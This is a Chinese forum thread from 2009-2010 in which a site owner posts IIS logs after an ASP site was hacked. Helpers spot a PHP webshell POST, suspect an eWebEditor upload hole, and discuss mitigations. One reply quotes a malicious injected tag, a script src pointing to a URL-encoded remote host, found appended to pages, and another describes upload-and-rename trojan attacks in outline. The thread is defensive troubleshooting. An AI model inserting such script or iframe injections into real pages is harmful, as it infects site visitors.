07:23:46 GET /flash/banner.swf 119.136.230.122 304 191 578
07:23:46 GET /images/logo_nav.gif 119.136.230.122 304 191 551
07:23:46 GET /images/bg.jpg 119.136.230.122 304 191 545
07:23:46 GET /images/dianhua.jpg 119.136.230.122 304 191 550
07:23:46 GET /images/qqconnection.gif 119.136.230.122 304 192 558
07:23:46 GET /images/menu.gif 119.136.230.122 304 191 547
07:23:46 GET /flash/lele.js 119.136.230.122 304 190 544
07:23:46 GET /images/aoyun.jpg 119.136.230.122 304 191 548
07:23:46 GET /images/biao.jpg 119.136.230.122 304 191 547
07:23:46 GET /images/xiao.gif 119.136.230.122 304 191 547
07:23:46 GET /images/l_moh2.jpg 119.136.230.122 304 191 549
07:23:46 GET /images/l_moh1.jpg 119.136.230.122 304 191 549
07:23:46 GET /images/l_moh.jpg 119.136.230.122 304 191 548
07:23:46 GET /images/bottom_bg.jpg 119.136.230.122 304 190 551
07:23:46 GET /flash/05.jpg 119.136.230.122 304 191 632
07:23:46 GET /flash/04.jpg 119.136.230.122 304 191 632
07:23:46 GET /flash/03.jpg 119.136.230.122 304 190 631
07:23:46 GET /flash/02.jpg 119.136.230.122 304 191 632
07:23:46 GET /flash/01.jpg 119.136.230.122 304 191 632
07:23:48 GET /images/navhover.gif 119.136.230.122 304 190 550
07:23:55 GET /lele/file/top.asp 119.136.230.122 200 1576 475
07:23:55 GET /lele/admin.asp 119.136.230.122 200 935 426
07:23:55 GET /lele/images/Title.gif 119.136.230.122 200 2723 482
07:23:55 GET /lele/main.asp 119.136.230.122 200 4925 471
07:23:55 GET /lele/css/master.css 119.136.230.122 200 2207 476
07:23:55 GET /lele/file/menu.asp 119.136.230.122 200 13383 476
07:23:55 GET /lele/images/left_top.gif 119.136.230.122 200 323 486
07:23:55 GET /lele/images/157889030.gif 119.136.230.122 200 1531 482
07:23:55 GET /lele/images/button7.jpg 119.136.230.122 200 14474 484
07:23:55 GET /lele/images/button8.jpg 119.136.230.122 200 14317 484
07:23:56 GET /lele/Images/left_bg01.gif 119.136.230.122 200 2225 487
07:23:56 GET /lele/images/topnav_bg.jpg 119.136.230.122 200 9840 486
07:23:56 GET /lele/images/frame_bg.gif 119.136.230.122 200 510 481
07:23:56 GET /lele/Images/system.gif 119.136.230.122 200 2349 484
07:23:56 GET /lele/images/menu.gif 119.136.230.122 200 2071 482
07:23:56 GET /lele/images/left_bottom.gif 119.136.230.122 200 324 489
07:23:56 GET /lele/images/quit.jpg 119.136.230.122 200 13974 481
07:27:30 GET /robots.txt 203.208.60.229 404 1445 254
07:27:30 GET /anli.asp 203.208.60.229 200 3759 291
07:28:30 GET /xiangmu.asp 203.208.60.230 200 3738 293
07:29:01 GET /lele/main.asp 119.136.230.122 200 4925 471
07:29:01 GET /lele/css/master.css 119.136.230.122 304 191 565
07:29:01 GET /lele/images/frame_bg.gif 119.136.230.122 304 191 570
07:29:01 GET /lele/images/157889030.gif 119.136.230.122 304 191 571
07:29:04 GET /lele/Images/left_bg02.gif 119.136.230.122 200 0 487
07:29:04 GET /lele/Images/left_bg02.gif 119.136.230.122 200 0 487
07:29:04 GET /lele/Images/left_bg02.gif 119.136.230.122 200 0 487
07:29:04 GET /lele/Images/left_bg02.gif 119.136.230.122 200 0 487
07:29:04 GET /lele/Images/left_bg02.gif 119.136.230.122 200 2090 487
07:29:05 GET /lele/about.asp 119.136.230.122 200 8989 494
07:29:05 GET /Code.asp 119.136.230.122 200 4369 506
07:29:05 GET /html/ewebeditor.asp 119.136.230.122 200 268 521
07:31:34 GET /show.asp 203.208.60.228 200 3646 291
07:31:45 GET /lele/about.asp 119.136.230.122 200 315 494
07:31:47 GET /lele/login.asp 119.136.230.122 200 2254 426
07:31:47 GET /lele/js/login.js 119.136.230.122 200 837 474
07:31:47 GET /Code.asp 119.136.230.122 200 4369 484
07:31:47 GET /lele/images/main.gif 119.136.230.122 200 38502 478
07:34:26 GET /lele/login.asp 219.134.222.43 200 2321 227
07:34:26 GET /lele/js/login.js 219.134.222.43 200 837 335
07:34:26 GET /Code.asp 219.134.222.43 200 4369 345
07:34:30 GET /lele/images/main.gif 219.134.222.43 200 38502 339
07:34:30 GET /favicon.ico 219.134.222.43 200 7588 255
07:34:50 POST /lele/login.asp 219.134.222.43 302 314 512
07:34:51 GET /lele/admin.asp 219.134.222.43 200 935 358
07:34:51 GET /lele/file/top.asp 219.134.222.43 200 1576 336
07:34:52 GET /lele/file/menu.asp 219.134.222.43 200 13383 337
07:34:52 GET /lele/images/topnav_bg.jpg 219.134.222.43 200 9840 347
07:34:52 GET /lele/images/Title.gif 219.134.222.43 200 2723 343
07:34:52 GET /lele/images/left_bottom.gif 219.134.222.43 200 324 350
07:34:52 GET /lele/images/left_top.gif 219.134.222.43 200 323 347
07:34:52 GET /lele/css/master.css 219.134.222.43 200 2207 342
07:34:52 GET /lele/Images/system.gif 219.134.222.43 200 2349 345

一部份IIS日志。。。

#11

aspic2009-10-21 10:00

主要应该看POST吧没分析过日志~

#12

aspic2009-10-21 10:02

04:32:36 POST /images/gifimg.php 65.182.191.191 200 175 2001

#13

friends5712009-10-21 10:47

sql注入代码应该添加了吧
还有就是互动部分,比如留言,提交图片之类,有没有过滤掉特殊字符

#14

aspic2009-10-21 10:54

sql注入代码还是sql防注入代码

#15

lele20072009-10-21 11:59

sql防注入加了。。问题是连inc.asp（防注入代码）也被写和了这个代码了。。

在QQ群里请教了。。hmhz版（多谢）。。暂时防了。。

关闭了FSO功能。。
关闭了空间PHP空间的支持（我被上传的是PHP木马）
删除了网站后台功能。。只保留前台能浏览的程序文件。。
甚至。。关闭了FTP空间。。。不能上传了。。知道密码也不行。。
切断了这些可利用资源了。。但愿明天不会有问题了。呵呵。。

谢谢各们位。。

#16

lele20072009-10-21 12:27

以下是引用aspic在2009-10-21 10:02:01的发言：

04:32:36 POST /images/gifimg.php 65.182.191.191 200 175 2001

你厉害。。我看了好久。。眼睛都快看得掉出来了。。都没看到这个。。

04:32:36 POST /images/gifimg.php 65.182.191.191 200 175 2001
04:32:36 POST /html/anli.php 65.182.191.191 200 160 212

当时也忘了查找。。

就是这个日志了。。呵呵。。

#17

lele20072009-10-21 12:30

但是即使找到了它。。我还是不太清楚漏洞在哪里？

我想应该是eWebEditor这个html在线编辑器的上传漏洞了。。。

#18

kgdipbyve2009-10-23 10:30

有可能是服务商那边的服务器里有个电脑中了病之后，在那里传播。
我公司页面卡的很严重查看页面代码时发现了这个。电话甩到机房里。那边查到是其它机子中标的问题。

#19

wormit2009-10-23 15:07

是呀   我也遇到相似的问题   烦死了
是在页面代码的最后加的    <script src=http://%75%72%62%61n%68%75b%2E%63%6E></script>
每次加上的形式是一样的      但里面的数字有所变动

大哥哥  大姐姐   好妹妹们    帮帮忙吧

#20

chenguoxing5172009-10-23 22:08

这个问题一般是你程序的漏洞造成的，而且一般都是上传漏洞，利用上传漏洞上传一个伪装的图片文件，其实是个木马文件，上传成功后，将该图片文件恢复为asp文件，这个文件一般就是黑你的人的登陆入口，利用这个文件可以访问到你整站上的所有文件列表，从而可以很方便的实现批量挂马等功能，现在的问题是，你得先找到这个文件，然后把你文件上传的漏洞堵上

#21

lele20072009-10-24 15:30

以下是引用kgdipbyve在2009-10-23 10:30:49的发言：

有可能是服务商那边的服务器里有个电脑中了病之后，在那里传播。
我公司页面卡的很严重查看页面代码时发现了这个。电话甩到机房里。那边查到是其它机子中标的问题。

应该怎样查服务器是中了此类型的病毒？、

上面的都做了。。后来。。挺住了几天。。又出现另一个。。

在</head> 加上：<iframe...... 变成了这种形式。只有首页。。

FSO也关了。。还是一样会有。。现在换了一台服务器。。

#22

lele20072009-10-24 15:31

以下是引用chenguoxing517在2009-10-23 22:08:34的发言：

这个问题一般是你程序的漏洞造成的，而且一般都是上传漏洞，利用上传漏洞上传一个伪装的图片文件，其实是个木马文件，上传成功后，将该图片文件恢复为asp文件，这个文件一般就是黑你的人的登陆入口，利用这个文件可以 ...

上传成功后，将该图片文件恢复为asp文件

如是上传漏洞。。它上传成功后。只是一张图片。。是如何恢复成 asp 文件的？

#23

lele20072009-10-24 15:38

我觉得，如果它上传的是一张伪装的图片。。上传会失败。的。。

我都用：aspjpeg 组件把上传的图片用它打开。。会打开失败。。捕获错误就可以删除这伪装的图片了。应该不存在这个漏洞。。

#24

wormit2010-02-20 16:58

问题解决了吗这么长时间了